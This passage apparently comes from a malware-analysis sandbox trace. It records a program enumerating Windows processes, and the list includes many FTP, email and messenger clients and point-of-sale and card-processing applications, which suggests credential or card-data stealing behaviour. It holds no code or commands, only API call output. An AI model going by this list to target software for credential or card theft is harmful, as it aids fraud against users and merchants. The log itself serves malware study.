pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.863] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.865] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.866] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.868] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.916] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.972] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.973] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0284.975] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0284.976] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0284.978] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.982] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0284.984] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0284.985] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0284.987] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0284.988] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0284.990] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.991] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0284.993] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0284.994] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0284.998] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0285.000] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0285.001] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0285.003] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0285.004] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0285.006] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0285.007] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0285.009] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0285.048] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0285.093] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0285.094] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0285.096] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0285.097] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0285.099] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0285.100] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0285.102] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0285.103] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0285.107] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0285.109] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0285.111] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0285.112] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0285.114] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0285.116] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0285.117] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0285.119] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0285.123] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0285.125] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0285.127] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0285.128] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0285.136] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0285.138] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0285.140] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0285.142] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0285.144] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0285.145] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0285.147] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0285.149] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0285.156] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0285.162] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0285.164] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0285.166] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0285.170] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0285.172] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0285.174] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0285.176] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0285.177] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0285.179] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0285.185] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0285.187] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0285.189] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0285.190] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0285.192] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0285.194] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0285.195] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0285.197] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0285.201] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0285.203] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0285.205] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0285.206] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0285.208] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0285.210] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0285.211] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0285.213] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0285.217] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0285.218] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, 